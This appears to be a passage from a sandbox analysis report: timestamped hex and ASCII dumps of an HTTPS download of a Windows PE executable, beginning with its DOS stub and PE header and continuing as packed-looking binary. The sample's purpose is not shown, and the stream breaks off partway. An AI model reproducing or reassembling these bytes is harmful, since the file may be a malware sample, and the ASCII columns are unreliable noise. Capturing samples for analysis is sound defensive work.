                                                                                                                                                  2022-11-15 17:54:38 UTC1INData Raw: 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 18 00 00 00 3c 10 00 00 00 00 00 08 fc 7d 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 ba 00 00 04 00 00 34 c0 54 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3f 50 19 00 50 00 00 00 00 60 19 00 2c 88 00 00 00 00 00 00 00 00 00 00 00 ae 53 00 38 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii: !L!This program cannot be run in DOS mode.$PELMa<}0@ 4T@?PP`,S8
                                                                                                                                                  2022-11-15 17:54:38 UTC2INData Raw: 22 dd a1 65 06 66 ff ac 91 e7 76 0e 91 fb ff 1f ef 08 07 fb a3 0e 68 91 87 2c a9 79 77 9c 56 1d 28 49 51 7b 9f fd f0 48 57 4b 0e 9e ae 8f 2c 23 9b d5 fe b6 22 c2 f9 c0 bb 24 a9 33 9e 7b d0 1c 38 f4 aa f3 f1 e6 27 f0 01 64 7c fc a3 09 1d 9e 0e 74 2c b6 c8 1c 1b 16 a7 be c6 17 af 20 2e 89 8e 1e e1 78 84 ae a9 16 c8 21 05 9b 78 fe 87 69 70 07 1e 0a 12 02 df 99 95 25 d8 c2 02 34 8d 26 ad bd 5b df 2c d6 53 87 36 23 5c e7 ce ce cd 9b f5 d9 03 aa 82 dd 71 8a 28 10 fd da 71 ff f4 0a ff f1 4d 5d 9a 06 8f 1a ac 8e ae a1 cd e5 d3 16 4c f0 59 1e 6c d9 44 cc a6 50 86 d0 e4 01 45 24 79 03 a7 09 ab 12 6f ad 8c e6 f5 27 5e 00 02 38 b0 1e 1f d3 9c 38 b1 13 b0 6f 40 3c bc 7f cd 5b 57 8e 17 8b 81 9d 3b 4a e2 86 fa 5c c3 a1 d0 ea 30 5b 4f 39 96 65 1f e8 4d 1d 26 ad 93 79 14
                                                                                                                                                  Data Ascii: "efvh,ywV(IQ{HWK,#"$3{8'd|t, .x!xip%4&[,S6#\q(qM]LYlDPE$yo'^88o@<[W;J\0[O9eM&y
                                                                                                                                                  2022-11-15 17:54:38 UTC4INData Raw: 86 47 16 f9 49 29 00 9c 55 eb 77 2f f2 f0 ed 03 58 d1 95 0d e2 31 f1 f9 0e 02 59 df 58 fb fe 31 fc 1f ca 89 6a a5 01 6a c4 b0 6b 8d 06 72 d7 60 0d 56 99 b4 e8 59 80 89 5f 0b 90 19 62 3c 64 dc 03 8a 02 3e 0f f3 9e e3 2e 1b 2f 41 1d ff da 0a 67 5b c3 89 ff f7 52 d5 6f f2 b0 5b 34 f3 de 9d 3c 38 cf 27 33 f0 cc 2a c4 39 1a ee 29 fe 31 80 d0 19 f4 a3 2a 43 1a 22 d4 5f bf 70 ff ec fa de db bb 95 f3 14 79 d7 64 eb 44 18 ed 39 f6 5f c4 7e 1d eb 07 0c 76 f4 af 77 6f 59 88 74 ec 1b ae 8c c1 ab 9b 76 18 18 9d ff d6 c7 2d cb ec d8 b3 cc b9 02 4e 16 df 6f 2c de f0 59 3a 06 57 d0 d1 e3 e9 f4 ea ca 27 05 cb e4 a8 c9 a6 05 ce b0 72 3a 44 99 9f d1 c2 22 a6 a7 af 4b bf 90 d4 84 cb a1 b0 60 11 0a 78 a4 d2 c2 ed fc c4 88 a4 a7 7e 0b 20 60 be d2 5d 0b 7a 70 5c 96 a7 b3 d6 5a
                                                                                                                                                  Data Ascii: GI)Uw/X1YX1jjkr`VY_b<d>./Ag[Ro[4<8'3*9)1*C"_pydD9_~vwoYtv-No,Y:W'r:D"K`x~ `]zp\Z
                                                                                                                                                  2022-11-15 17:54:38 UTC5INData Raw: 6a 79 65 af 69 7e cb d4 c4 73 b1 db d3 a0 c5 c7 bc a9 65 e7 69 66 8f de d5 a2 d3 da b3 83 d2 b3 3c 38 c2 c4 24 a2 1f d2 1b 1b 97 d2 97 8c 7e 9c ab 25 c1 b1 83 d0 c4 7a d9 83 ca db 98 4a 97 47 e0 3e ce 21 84 ce d6 b3 6b 8e f7 72 cf cb d4 07 6c a0 13 a1 05 7b d2 dc d4 47 f7 0f d7 e4 43 47 ca 7d 5e 98 8f a8 b6 3a 5b 81 e3 e5 2f d4 d4 77 a5 db 76 a3 f5 97 a6 b8 8b 79 e2 d6 d1 4b d7 bf bd da 87 96 d3 78 c4 bb 70 a5 7f d4 bc 67 c0 37 b5 67 a6 5d a3 f0 d2 1c 4d 99 91 87 ca b7 df 30 d1 cb f7 e1 88 62 7f 50 76 fa d8 a4 74 a0 f3 0a ab a6 6a 4b 16 7c 93 e4 90 00 64 a5 6f 98 77 d6 2f b8 97 e7 d4 0c 98 1e 69 c6 c6 1f 2f 9b d6 13 9c fe e3 b4 70 93 2b 34 93 cb f1 86 c7 66 66 7b e3 77 c7 28 df 86 da 9e ec 6a f7 bb a7 3b 95 09 e8 73 83 98 93 77 8a 57 16 68 62 a2 8c 67 a4
                                                                                                                                                  Data Ascii: jyei~seif<8$~%zJG>!krl{GCG}^:[/wvyKxpg7g]M0bPvtjK|dow/i/p+4ff{w(j;swWhbg
                                                                                                                                                  2022-11-15 17:54:38 UTC6INData Raw: 48 91 fe 6f c2 91 fe ed 50 d1 e2 d5 0c cd ba 63 f9 74 b1 cb 1a 96 7f 22 a3 10 b8 13 4f b2 dd 59 a1 5c b4 c8 aa 7c be 72 c4 c6 d8 d6 c6 4f b2 02 6e c7 27 d1 e2 07 e9 fc 83 a6 b0 1a a3 f8 d1 9b f6 ab e3 28 3b d6 af cf 42 b5 01 6b bc aa cf eb 40 a3 e0 9d ce 84 da ab 57 da b4 9e 9e c2 ed 05 9e 86 a2 6c ce ce d6 0d 86 c2 06 9f 9b 64 d5 a6 94 ae 7d 59 99 32 8f 8c a4 ca e1 c5 7a d5 14 6c f4 6d d1 d3 ab a9 fa 8b 91 a1 ff 59 95 ee 56 8c a4 c2 d6 86 41 f9 b2 03 e8 61 c6 a8 9f ce 38 dc c8 83 c0 b6 56 14 91 60 d4 0c 93 c7 8e 35 dd 41 3e c1 87 f7 a5 fa 77 c9 4b d2 97 b3 86 6e 23 c3 ed 92 b6 43 00 bb 8f d4 ae 81 96 ae 7e 12 9d 78 aa 11 df f6 61 ab 0e 83 3e 74 b4 87 87 bf a6 65 42 a4 14 69 a5 8f 39 73 9f 77 5e d8 8f 7a e3 99 14 87 7a 95 5a cc 92 85 d8 42 95 c8 a8 c7 d7
                                                                                                                                                  Data Ascii: HoPct"OY\|rOn'(;Bk@Wld}Y2zlmYVAa8V`5A>wKn#C~xa>teBi9sw^zzZB
                                                                                                                                                  2022-11-15 17:54:38 UTC8INData Raw: c4 fb b3 cf 2a 7d 53 c5 44 51 4e 5e 41 07 b7 37 d8 9b ee 0d b6 2b 18 24 bc 9b b6 9d 82 37 de 2f ec 54 a1 23 a4 e6 a6 c8 6d 58 b5 05 4b 50 21 f1 05 43 ee 1a 1d 07 bd d8 68 1a 16 4a 10 a7 16 b4 85 25 8f 52 d8 e4 85 1d ee 2b 0b 42 f8 87 e6 15 19 18 77 5d 3e 58 2c 06 0f d5 f2 bd 98 7a 45 67 1f 86 6d 5f 11 64 cb 18 1c 31 40 a8 49 41 9e ec 82 5c b4 fa 91 d0 45 31 79 49 76 b2 35 3d 56 5f 66 e2 f3 18 13 27 c3 1e 58 49 f4 1d f6 a6 87 25 40 2a 8c af 0f 9f 0a 06 7a e2 0a de b0 ed 29 6c f1 c6 22 67 e5 93 b9 04 ec 95 d0 1f a0 32 a1 7d 5c 63 1b ae e1 66 af 01 56 73 b6 e4 1f 5e 77 95 22 cd 33 29 b6 54 46 43 df 2b 52 37 b7 da 65 d3 13 e5 69 46 bb e5 e6 ba 42 20 e4 89 59 7d 7c 7e 14 a2 1f 5e 98 d5 44 5b 63 d8 a7 9e 4c 35 b3 c7 98 20 ea 52 1a 3e 05 a5 67 6f f2 40 8e df f5
                                                                                                                                                  Data Ascii: *}SDQN^A7+$7/T#mXKP!ChJ%R+Bw]>X,zEgm_d1@IA\E1yIv5=V_f'XI%@*z)l"g2}\cfVs^w"3)TFC+R7eiFB Y}|~^D[cL5 R>go@
                                                                                                                                                  2022-11-15 17:54:38 UTC9INData Raw: 1b fd 07 85 eb ae 3a 93 95 94 fb 5f 5f 11 a2 af cc 73 e3 30 eb 7a 0f 25 dd fb 5e 23 e9 e5 18 d0 03 89 54 a9 44 42 57 b9 a1 57 3c fb cb 70 a7 ba 5b 76 9d a8 eb f8 e4 55 16 18 a7 8c 86 0d 36 a3 55 87 8c 6c 43 8d f7 ed a1 70 1a 58 53 43 e0 0b 6f 36 29 a8 9c 8e 5c e7 4b 74 ee a9 ae 3b 15 65 bf f1 85 f4 8b 1e 7e 0e 9a 47 cf 59 1e ba 18 5d 23 f7 0a af 9b 86 98 ae df 77 d2 d5 2d d1 2f ce 1d e9 ab 64 8a 36 7e d1 da 9c 9d fc 20 9a d2 17 6c 13 1b 4f 3b 75 fd 02 42 85 60 3e 63 96 9b 87 5c 51 b6 11 69 cc 1d 99 51 ec bd 05 86 42 ee 38 26 00 c6 3e 9f 44 35 e6 cb df 75 1e 66 bd 15 de 86 ec 9f b5 47 fe 0b 0b 89 b3 38 a4 42 99 51 59 20 7c 48 31 9b 30 6c 94 fb 66 0f c7 4c 4f 0a 5b 17 90 d7 a4 94 08 16 39 e8 0b 51 81 e5 a5 9a 78 6b 53 df 99 61 0f e4 98 5a 8e a7 5a c2 d0 5e
                                                                                                                                                  Data Ascii: :__s0z%^#TDBWW<p[vU6UlCpXSCo6)\Kt;e~GY]#w-/d6~ lO;uB`>c\QiQB8&>D5ufG8BQY |H10lfLO[9QxkSaZZ^
                                                                                                                                                  2022-11-15 17:54:38 UTC10INData Raw: 7d fd 16 66 fb 22 ea 83 90 4a 0d b3 93 c4 f9 34 96 26 af 6b c3 18 60 95 7c 4a 91 8f bf 1a ff d4 36 62 cd cf 6c 68 df b8 64 92 b7 40 0a b1 99 63 19 84 d1 69 ee 00 be 15 ce 5a 53 d7 b0 72 b6 0e 8f 1b f0 92 07 28 a6 84 ff da 9f 24 66 8e 78 87 db 20 30 8d be fe 56 33 34 06 ba b9 b0 04 f9 dc bb 1f 09 52 b4 6d ec f3 c2 3b c2 00 b2 6b e5 f0 da 61 9c 57 92 a3 9a 9c e4 83 a7 cf 5e 39 1b 38 b3 d1 17 60 48 e3 75 c9 7e 66 10 4c f6 2c ed f7 da 5c cb 84 06 b3 ea 6f ba e8 9b 09 4e 78 7f 9a 56 47 7f c4 5c 98 b7 f5 6f 1a f8 7d 44 6c 9e 23 fa a6 d2 58 b9 b6 91 59 e3 a7 ac c5 6f 1d fd 98 e3 15 f1 29 80 14 ed 91 48 c2 63 9b 33 1f 8b 42 95 f8 8d 97 ce ad f4 2f ed 38 84 4b b8 6f 84 de 2d 1f 4a 6d 0c db 9e 1b 1f 5c c3 3e b0 ea 20 e6 52 41 4e 6c 80 1e 90 a7 0f ab ed 60 f4 65 4e
                                                                                                                                                  Data Ascii: }f"J4&k`|J6blhd@ciZSr($fx 0V34Rm;kaW^98`Hu~fL,\oNxVG\o}Dl#XYo)Hc3B/8Ko-Jm\> RANl`eN
                                                                                                                                                  2022-11-15 17:54:38 UTC12INData Raw: 5c a7 61 ec f7 ee 98 ae 22 b6 c0 65 db fd 2a ff c6 8c 35 4a 21 b6 98 72 be 71 25 cb 54 86 3f b6 5c 8f cf 64 b3 c6 34 f8 2e 69 27 b4 9a 1c 5e e4 15 25 9b 73 b8 fc bd c6 cc 83 53 9a c1 70 61 dc 8b 8c 5b 36 b6 24 7d e0 1b cb c4 b3 79 9e 8c 7d df 71 84 1b a6 a1 58 3c 46 97 50 98 57 61 9c 14 0f 05 4d 10 2e 4c f5 be bd 18 c6 49 23 43 e7 de 14 dd a0 8a 1e 60 5a 1e cc 84 b5 46 fb ca 44 cd 1e 0a b7 7a 7f 96 77 8d e8 87 33 8c 05 e5 a6 60 83 bf 0a a2 a7 d2 43 bf 3e 52 51 ec d7 c3 59 47 4e 13 e0 4c 3a cf 20 6a 60 ef a1 d4 64 e6 23 1a f5 f8 76 2c ac 9a 3f ac a8 1c 20 8f 0c 5e d3 00 f6 c1 d5 8d 11 f0 cb b6 c9 1c c6 57 22 59 d1 47 66 d6 2c bd d6 95 1e 10 e6 04 35 02 3c 97 56 46 4d f4 c6 9d ec 5b d8 af c9 df 6e 4c 1e ac a9 90 ec 00 83 24 37 1d f5 9c fd 3e bb 05 d6 c1 61
                                                                                                                                                  Data Ascii: \a"e*5J!rq%T?\d4.i'^%sSpa[6$}y}qX<FPWaM.LI#C`ZFDzw3`C>RQYGNL: j`d#v,? ^W"YGf,5<VFM[nL$7>a
                                                                                                                                                  2022-11-15 17:54:38 UTC13INData Raw: f8 48 f3 12 3a 5b 0a 3e dc 5b ab c4 89 1f 62 cb 97 a3 bf 4c 32 ef 65 b7 2b ff 6e e3 7b 9c b4 bf 15 59 7e 3d 3e 00 20 6b 27 75 84 bf 67 69 44 61 97 be b9 44 ec d7 d2 11 c9 18 f0 5d dd 5e 4e d0 22 3e 98 57 1d 86 8d fc 99 00 57 30 b5 97 49 a9 b9 78 be 19 c4 8a fd 74 5e 86 5a 7e e3 3c ac 17 94 a0 3b 1a ee 68 b2 0f 1b a3 46 ec 91 78 bb 20 8a c3 87 05 0a 66 c4 9c 07 56 bf 64 4a e8 ce d9 85 60 3e bf fb 1e 44 1f bf e1 47 ed b9 26 9e 47 81 04 79 e5 cc d8 b4 9a 4e b6 24 b3 b2 69 be fe b8 56 a0 a9 a8 54 6d d0 f3 f5 44 27 9a b4 f0 f1 c2 2d 06 5e 1a 24 94 a8 2e 65 35 9a aa 95 b4 59 d4 df af 96 20 c2 98 63 f7 48 44 4e af 8b cd 1f d2 27 e7 6f eb 02 fd ee 50 07 49 16 95 90 de 05 7c 06 48 c0 9d 45 16 3f 55 6d bc 93 a9 3b 4d 54 5f 48 66 7e 5a 57 fc 6d fc 0c 76 75 84 31 1e
                                                                                                                                                  Data Ascii: H:[>[bL2e+n{Y~=> k'ugiDaD]^N">WW0Ixt^Z~<;hFx fVdJ`>DG&GyN$iVTmD'-^$.e5Y cHDN'oPI|HE?Um;MT_Hf~ZWmvu1
                                                                                                                                                  2022-11-15 17:54:38 UTC14INData Raw: 3d 51 15 9b 5c 28 70 d3 84 c1 d1 38 39 98 60 fb b3 76 46 8b 2c a3 17 61 5b 66 b5 05 11 45 0d f6 74 99 84 8d 39 f1 71 a6 4e 76 5b 65 79 fb 1e b0 6a 62 4d 60 f3 56 09 96 dd b7 17 74 39 db 49 fe 16 96 3c a5 59 cd 80 a3 e9 f5 fe dc be d8 00 0f 28 89 da 92 5e f8 1c e0 12 a0 f1 42 5b 60 d0 d0 8f 81 bc 39 e2 b1 c9 d7 11 db c4 0c 3c ac c7 93 90 f1 fe 1c 08 5b be 6e 2b fb fa 9c 4d 93 2f 59 16 56 97 9a d3 cf 1c e1 be 62 c4 5e 8b c0 73 94 36 3f ba f9 2a f6 96 93 87 ee 8e 58 5b c9 ec a5 f4 42 05 ec 09 be 9f 9c 3e 7d 27 3c 74 95 a1 64 bf dd 56 9f 88 45 41 fd c5 48 d9 92 56 28 c0 15 bb f0 76 81 a0 09 32 56 4d 04 6c 55 bc d6 cd 78 24 6c 5a 9f 77 2d 24 9e 59 7a 3a aa 7f 65 ee 2e 1b e7 34 a8 3b 4a 2f 9c 85 ec 91 9f ca 36 0c 66 5b 2c af 29 4b 18 02 dd 05 54 cb 0a 1f 21 01
                                                                                                                                                  Data Ascii: =Q\(p89`vF,a[fEt9qNv[eyjbM`Vt9I<Y(^B[`9<[n+M/YVb^s6?*X[B>}'<tdVEAHV(v2VMlUx$lZw-$Yz:e.4;J/6f[,)KT!
                                                                                                                                                  2022-11-15 17:54:38 UTC16INData Raw: eb b6 93 91 a7 37 5b de 04 fd 0a dc 09 9a a0 40 4d c3 e0 0d bd c1 5e a9 36 d6 87 ae d6 96 cd ab 26 cd 63 a7 35 3b 2a 18 1a e6 57 cb 8c ed 57 53 e6 94 61 29 b3 d9 8c ec 0b 31 62 83 7b 02 ad 93 aa 16 91 79 2a ac c6 23 b4 f7 fc ab 2e 60 f4 5a 54 5b a3 a6 91 d2 de 98 a2 0c 19 4f af ee e2 5c 0d 7a 8a fe ea f7 7d da b3 f1 ed 8b 34 da 02 84 53 88 8c ad dd 8e 67 27 96 19 5e d6 d4 58 1d ea 94 ad e2 26 54 42 f5 9b 54 1f c3 52 81 a1 07 3a 79 71 b1 19 99 30 1c d1 f7 13 ce 9c 52 d5 cc 7d 7f ee 7c e5 29 1f 92 00 5c a7 6f 5d 45 87 29 5e a7 d0 fc 8b af 2b 68 4f b0 64 43 da 80 5e 80 a3 66 b1 51 f3 60 ae c4 fd 04 13 1b f2 76 7b 18 4f 5a 1f c1 20 af 52 00 e3 0c 74 10 65 76 c4 b1 58 e3 dd 74 2d f6 bc ab fa 32 25 e9 e3 6f 27 b3 9c 96 47 85 19 e3 b3 44 0d fd 68 77 eb 44 8e 6e
                                                                                                                                                  Data Ascii: 7[@M^6&c5;*WWSa)1b{y*#.`ZT[O\z}4Sg'^X&TBTR:yq0R}|)\o]E)^+hOdC^fQ`v{OZ RtevXt-2%o'GDhwDn
                                                                                                                                                  2022-11-15 17:54:38 UTC17INData Raw: b2 0d 22 ab d8 0f 33 74 31 99 bc d7 3e 8e ca 81 9c cf b5 bf 4d a1 a1 93 3b 10 c6 78 3f ca a4 74 a3 55 7a 8c e9 ed c6 70 62 66 0b 0c 74 3e 17 a2 85 2d dd eb 10 6a 99 ed e9 64 2d 5c 3d 64 7d e9 35 ff 39 2e 28 bb f7 39 01 9e 34 82 89 ed 8c c2 2d 84 51 85 97 f4 e3 86 4d 42 0b de c3 38 56 74 5e a7 56 fc b5 cc 8b e5 8c e9 43 cc 97 e8 01 c6 e3 ff cf 5f 91 99 9a 66 69 bc 5a 5f d5 be 4a e8 8e f8 3f cc f5 24 22 84 c4 e9 72 f3 f0 3f 73 30 0c 27 f3 98 20 c8 90 e6 23 3b 00 cc 1b fc 7e 81 c6 51 f9 5c 6b ae ab 44 7f e9 43 f9 18 b4 64 04 51 99 2a 9f e3 e8 53 ed 75 83 3b 5d 2f fb be cd 6d 99 f6 fa 7d e4 7c 84 b8 e4 43 a8 6c 35 2a 4c bf 85 bf a7 8c b8 44 1b 6d 7b 45 32 78 4a 64 e2 14 d1 f5 d1 63 4a 5a c4 9e 8f 93 d2 f9 5f 84 b4 3b a4 aa a4 bf 45 80 25 a0 e2 4c 95 9c b9 9b
                                                                                                                                                  Data Ascii: "3t1>M;x?tUzpbft>-jd-\=d}59.(94-QMB8Vt^VC_fiZ_J?$"r?s0' #;~Q\kDCdQ*Su;]/m}|Cl5*LDm{E2xJdcJZ_;E%L
                                                                                                                                                  2022-11-15 17:54:38 UTC18INData Raw: 57 92 ba 8e 3d f1 e1 c8 ea b2 12 3f 24 53 f4 72 2b 60 b4 9b ae f2 1a a7 56 a8 84 7e 83 6b 93 08 c8 82 52 4c 97 c3 42 2f ab d6 65 4d f3 48 77 6d d1 43 f0 ae f0 c5 58 e6 a1 be d8 f2 98 ec 42 1f 57 b2 3e 39 e7 3a 63 e7 d7 8c dc 93 ed 14 ee d7 bd 4f 4f f7 5e 27 fe c2 94 3b 32 fd ba 6a cf 74 9e bb 36 5d 87 94 26 61 44 f6 06 4c 1e 5d e7 9a 23 e3 15 6d 16 2e a6 d6 88 96 4f 1d 40 66 da e8 d5 ad 28 33 a5 26 7e 04 e6 03 bd c3 5a 73 8d 9a b8 87 73 db 5b 32 c4 5b 5a 55 7e b8 5e 1a 46 72 3d 70 b6 f3 eb 83 d8 0b 33 68 0d 1b 8b 9b 33 c2 4a b6 e1 df 47 59 b3 5d 23 ca 72 dd ba cd 93 99 79 0c 71 80 70 23 b9 e4 f0 96 b3 33 40 20 86 9a 60 bf 26 30 6f ed ea 46 81 bd e4 19 82 22 a3 58 02 c1 1d 76 58 1a 72 98 5f 89 7a 5f 98 60 f7 b3 0f 9d 0d 1a d4 35 b6 67 1f 5f 01 99 58 90 61
                                                                                                                                                  Data Ascii: W=?$Sr+`V~kRLB/eMHwmCXBW>9:cOO^';2jt6]&aDL]#m.O@f(3&~Zss[2[ZU~^Fr=p3h3JGY]#ryqp#3@ `&0oF"XvXr_z_`5g_Xa
                                                                                                                                                  2022-11-15 17:54:38 UTC20INData Raw: 2a 92 c7 ab f9 b0 05 5c 7b 34 1d f3 89 d1 43 96 e7 ba ca 91 d7 88 cc 0e 45 3f ca c7 5d 60 5c ed fc 36 a6 06 d8 f8 fb b9 49 bd 40 71 bd 44 19 55 f9 82 de ea 0c b1 78 9c 85 aa 6f 61 1a 76 6a ee 92 82 28 ae 9d 5f a8 e1 20 af f0 1a a0 4c 79 bb 32 91 9a b7 ab 98 04 d6 61 87 c3 dc 62 d7 c5 56 67 6e 9c 91 13 41 d1 3c 8e 1a ac 5d a7 2b 19 c6 4e af de 50 00 c6 0f 92 b2 8f 8b ef 51 f3 c0 a1 9b e4 03 f1 22 7e 3d d2 6d 26 49 b6 41 8c e3 9f 29 81 20 40 9b b8 71 27 6d 3c b4 d1 e6 c2 88 a7 0d f7 a3 2f 5e e3 2c 31 23 5f a2 df 93 e8 60 5c 56 7f 9b 7b 3b c5 37 56 f3 7e f7 a7 d6 8c 2a d5 7a 30 6e 04 fa dc 59 9e b4 97 15 f2 90 ce b8 9b e3 ee d4 dc d8 a6 a4 20 41 45 29 60 00 b6 64 1e 2a f4 ee d0 ce 06 6c 2f 2d 6e 15 68 4a e6 5e a6 b8 ff 2f 5a 26 40 36 86 dd a3 c9 b1 3b ea 6c
                                                                                                                                                  Data Ascii: *\{4CE?]`\6I@qDUxoavj(_ Ly2abVgnA<]+NPQ"~=m&IA) @q'm</^,1#_`\V{;7V~*z0nY AE)`d*l/-nhJ^/Z&@6;l
                                                                                                                                                  2022-11-15 17:54:38 UTC21INData Raw: d9 a5 ed db 74 da f9 28 53 e4 85 55 0a 2f 5f 32 3a b5 d1 29 60 95 4c 7b 1e 87 57 74 98 99 b1 4f 43 6d ff 75 a5 36 b3 33 45 25 bf 53 8c 99 81 33 0b 2e e6 42 a4 07 6f d6 e8 d3 71 6e 97 c0 dc 76 b1 c4 6e 86 b9 d9 3b 4d 42 6d 97 05 21 8c dc 66 cf 22 24 c6 61 06 54 c9 96 0f a1 73 9c ce 51 74 54 4c e4 53 36 0e 89 74 3d cd 8e 43 ea 5e dc 2c 29 66 93 99 6e 27 8a ab ea 8c 99 bd 44 4f ed 7d 15 67 2c 1a d6 85 aa 5a d9 6b c9 33 b9 22 ff f8 bc b6 73 66 7e 17 3a f7 6e 78 9b 75 77 17 a4 55 03 dc ea f7 fd 7a 69 90 c5 c2 94 0d 6a 7a dc 5e 7a f1 5e e7 76 40 ae b7 63 c3 b2 83 46 b4 56 15 b2 13 19 5d f4 ad de e7 41 dd 8e 6e e6 39 d6 78 56 0f b6 64 a6 1b 4b 62 24 0b 96 75 5e 5e 94 29 f1 af 22 38 c9 16 31 35 6f c9 d7 16 9f 6a 42 e9 f6 46 c5 67 81 5f 72 8b f0 b2 8f 81 ed 2b 08
                                                                                                                                                  Data Ascii: t(SU/_2:)`L{WtOCmu63E%S3.Boqnvn;MBm!f"$aTsQtTLS6t=C^,)fn'DO}g,Zk3"sf~:nxuwUzijz^z^v@cFV]An9xVdKb$u^^)"815ojBFg_r+
                                                                                                                                                  2022-11-15 17:54:38 UTC22INData Raw: a9 da e8 40 41 80 d8 07 2d 1b 26 b1 b8 13 e9 2a ba e1 4a 0a c5 2a df 4b 59 fd 43 7b be d3 28 88 eb aa eb f2 64 6d e7 f2 fa d1 5e ce 6d ec 6a c9 1a cc fd 76 29 1c 2b fd 7a 7c 4f 13 bd 16 a5 2f 35 6e 7d d0 47 cc a7 c0 1e 8c 79 5e 99 e2 1e 5b 3d a7 84 86 d8 ae 5f 2f 0c d5 5a 7e d0 88 19 7d 5d 3a 5c 9e 12 f8 0c 03 3a 5a b3 f6 9c 86 fd 81 f5 f6 cc be be 54 64 8f a7 b5 5a 3d 7a 1f b2 32 a7 78 45 ca 5b 63 77 19 4c 5b c7 6a 1d 24 ec 3a 1e 44 3b 83 f1 b7 63 05 9c ab fd a6 22 41 d7 29 1d 8e b8 f6 6c e5 43 33 04 aa 21 01 f6 17 af 44 ce 93 30 ce 09 01 86 46 db c2 ce 37 31 d6 e1 31 bb 73 6d a5 17 83 bc 13 8a 5f 10 e3 ec 17 79 34 07 31 c6 1f f2 0a 54 ee 99 f4 21 80 b5 9a 40 af 22 ed 5b 09 b5 f5 f7 a7 d4 ee 53 c2 9c ca d4 9f 39 2d c4 2c 0f f3 11 9b 89 f9 d6 64 43 b4 97
                                                                                                                                                  Data Ascii: @A-&*J*KYC{(dm^mjv)+z|O/5n}Gy^[=_/Z~}]:\:ZTdZ=z2xE[cwL[j$:D;c"A)lC3!D0F711sm_y41T!@"[S9-,dC
                                                                                                                                                  2022-11-15 17:54:38 UTC24INData Raw: 07 64 f8 ab 8c d9 95 d6 25 27 a0 4d bc 74 fb a0 9f ad b7 14 9b 36 5a b9 65 9c 61 20 e2 a7 5d b0 a8 cf 32 4e e3 ce 80 7e 8a ff ef 17 99 e7 49 06 48 13 57 da d7 34 ac a7 46 cc fe cb 2f a0 7a 5c ac 1b 54 d1 e6 2b 3a e5 3c 13 d8 eb f4 ad 8c 49 b7 d1 85 85 b4 76 c9 bd 77 2e d1 92 cc 17 76 05 66 fc 36 3a 91 19 a0 6f ed 88 4b 9d 5e d9 77 5d d9 56 9d b3 6b 47 fe 23 8e 25 97 53 59 fc b8 61 f3 24 e5 c6 b5 83 78 0b db 85 85 58 bf 8e 93 b3 99 8f 9c 7c 17 6f 82 2e d0 54 8d 15 44 29 37 f6 34 6a fe de 93 43 c7 8c e2 28 60 ed bf de 97 ec 9c c4 fe e4 3a 37 4b c9 d2 18 51 5d 00 86 21 f9 d7 0e be b3 50 59 50 e3 e5 58 44 fa a3 aa 49 22 f8 0b 27 0e 85 c3 62 3a a3 53 c9 e4 d6 46 27 2f 01 96 96 34 d8 fa 78 f0 6e ac c2 4b bb 1a 7e 4f 49 57 67 7a 59 78 48 73 a2 16 ae 4d f0 e6 cf
                                                                                                                                                  Data Ascii: d%'Mt6Zea ]2N~IHW4F/z\T+:<Ivw.vf6:oK^w]VkG#%SYa$xX|o.TD)74jC(`:7KQ]!PYPXDI"'b:SF'/4xnK~OIWgzYxHsM
                                                                                                                                                  2022-11-15 17:54:38 UTC25INData Raw: 56 46 1f 80 1b 2b 91 2a 56 f4 a1 3c fe bf 3f 90 1a 89 e5 af cb 5e e3 9a 3a c5 e7 88 df 17 ad a3 37 9e ff c2 27 8f f2 4b b7 b8 f5 99 74 e6 b9 0f 01 c0 0b 15 88 ce be c8 aa fa ca 1f 78 28 18 04 3e 08 65 45 62 9d d8 77 e1 66 b1 85 1a 8d 45 e0 e5 3c 07 38 3b 94 7f 32 94 a3 3f 50 00 32 f1 5f 1a 02 cc 9f 8e 84 74 96 6a 32 f7 57 43 ed e5 a5 75 0f 9a 1c d1 bf 4d 06 4f c9 38 a4 7b fd e1 ab 8d 8f c5 2f 66 dc 98 6c b2 03 c5 1a f2 e6 08 89 91 30 f3 d9 34 1c 57 c9 3b fe c0 52 b5 0b d2 ee e9 77 4f 6f bc 16 c3 76 68 36 7a 97 6a 17 53 d0 4f 5f 6f 75 d7 f4 e3 57 23 23 64 68 cf 37 5b 2e a2 be 1f ff 83 e9 3c 9e 50 c4 3d f5 cc e7 7d 96 85 5c e7 ab 99 f3 f3 d5 95 93 9e 86 99 d5 5c ea 92 a3 4f eb 7c ed b2 d2 a4 7f 73 df 50 67 2c 08 af c7 23 ce 8b c5 7a 42 9d 80 bf c8 e4 ae c8
                                                                                                                                                  Data Ascii: VF+*V<?^:7'Ktx(>eEbwfE<8;2?P2_tj2WCuMO8{/fl04W;RwOovh6zjSO_ouW##dh7[.<P=}\\O|sPg,#zB
                                                                                                                                                  2022-11-15 17:54:38 UTC26INData Raw: 0f 7c be 0f 70 08 9f 89 3e 01 fd 58 cd 25 8a 33 b8 5d a7 08 93 76 45 33 13 c2 11 77 f7 34 b2 9c 1e 82 c1 14 5a 0b 83 ff 1f a8 58 7d fe a5 81 59 a5 b0 75 2b e5 25 9d 80 e9 93 18 d4 d1 43 17 de 80 f0 16 43 91 61 27 0d 32 d4 03 42 e2 92 9a a3 34 39 52 1b cb c5 41 5b 2d 7c 1e 5e 5d e8 b0 bd 18 f4 9c 7c 8d 4c c6 e7 4a aa 1e 31 1d 80 97 56 58 2b b5 9b 17 74 21 1b bb aa bd 6d 25 dd 23 23 5d 64 26 57 c9 1c 84 bc 37 08 85 8d ac 3a d4 ff 4f 1d a3 b0 de 05 ff 99 b0 50 df 0f 24 36 0b 4c 7a d9 17 53 b3 fe 0c d6 82 a6 f5 91 a8 f0 1a 1e 22 26 8a 27 ed a5 99 b8 aa f7 e5 00 7d 6d 48 86 de 59 d1 76 8b e9 53 ec c8 18 fb 26 9c 46 db 63 48 5e ea 